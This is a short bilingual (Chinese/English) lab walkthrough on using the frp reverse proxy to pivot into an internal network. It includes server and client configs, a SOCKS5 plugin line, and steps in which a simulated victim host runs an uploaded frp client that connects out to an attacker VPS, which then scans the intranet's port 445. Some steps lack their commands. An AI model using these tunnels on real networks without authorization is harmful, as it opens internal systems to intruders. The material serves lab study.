frps.ini的配置文件如下:
[common]
bind_port = 7000
[common]部分是必须有的配置,其中bind_port是自己设定的frp服务端端口,用于和frp服务器端进行通信。
frpc.ini配置文件如下:
[common]
server_addr = VPS IP
server_port = 7000
[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000
[common]部分是必须有的配置
其中server addr是VPS的IP
server port是用来和frp客户端通信的端口,必须和frp服务器端端口一致,默认是7000。
[ssh]可以修改成任意名称,local ip是本地的IP,local port是本地进行监听的端口,
remote port是访问VPS时需要使用的端口,也就是说访问到这个remote port端口时才能访问到内网。
启动frp客户端:
./frpc -c ./frpc.ini
启动frp服务器端
./frps -c ./frps.ini
frpc.ini中添加这一行指明类型 plugin = socks5
Simulated internal network environment:
All virtual machines are set to host-only mode.
Win7 simulated attack machine ip is 172.168.84.129.
Win10 simulates the victim machine network card 1:172.168.84.128, network card 2: 192.168.17.165
Kali simulates public network vps ip to 172.168. 84.130
First look at the win10 network card, 172.168.84.128 is the host-only ip, 192.168.17.165 is the net ip:
1: Start the service on the vps, that is, on kali
tar -zxvf frp.tar.gz
cd frp_0.34.3_linux_amd64/
./frps -c ./frps.ini
2: Win10 executes the frp client we uploaded:
3: Set proxy rules on the attacking machine (win7)
and then add the socket proxy in the proxy rules.
Open the routescan just added, and detect the 445 port of the intranet ip
https://mp.weixin.qq.com/s?__biz=MzU1NzkwMTc3Mw==&mid=2247485560&idx=1&sn=7096e35ad0bcb7069dcdc41709e8f042&chksm=fc2ffadacb5873ccbcbac6adb0ce0d9bae79baceebd62563b0b3b402df8a65097bdcc8577c8f&mpshare=1&scene=1&srcid=1123CUljOeuX6cWRkL4AqePM&sharer_sharetime=1606111990010&sharer_shareid=72c8d0a645ffb8d66b3624f86f1399d6&key=cd8d71bf880842d5f1b2591c963c7172ed81668d8011e7dbbe6d06d24cec7417cb16c69379c05d262e5e9347f55e616cff16928a3c292a1b18cfdb54c7c0bce182a8fef424c2b4ca8ad6113d0bc3d1d3914a1e4f0d7097908a1c80ba3d9f6b2484c3dd5651463fb5db8ba5e4741b1bc25ebcccbf72b33a478d49d3b58bc90507&ascene=1&uin=MzQ2NTAxMzQ1MA%3D%3D&devicetype=Windows+10+x64&version=6300002f&lang=zh_CN&exportkey=Aakp5suNP362OQA2F5sC1hg%3D&pass_ticket=rj8lRtkWnwrwA%2BzuPImFEkx8DqpYVBf7Ckjhe9e%2FArOvh7k6SbD0htsES0kc0U%2B7&wx_header=0
参考链接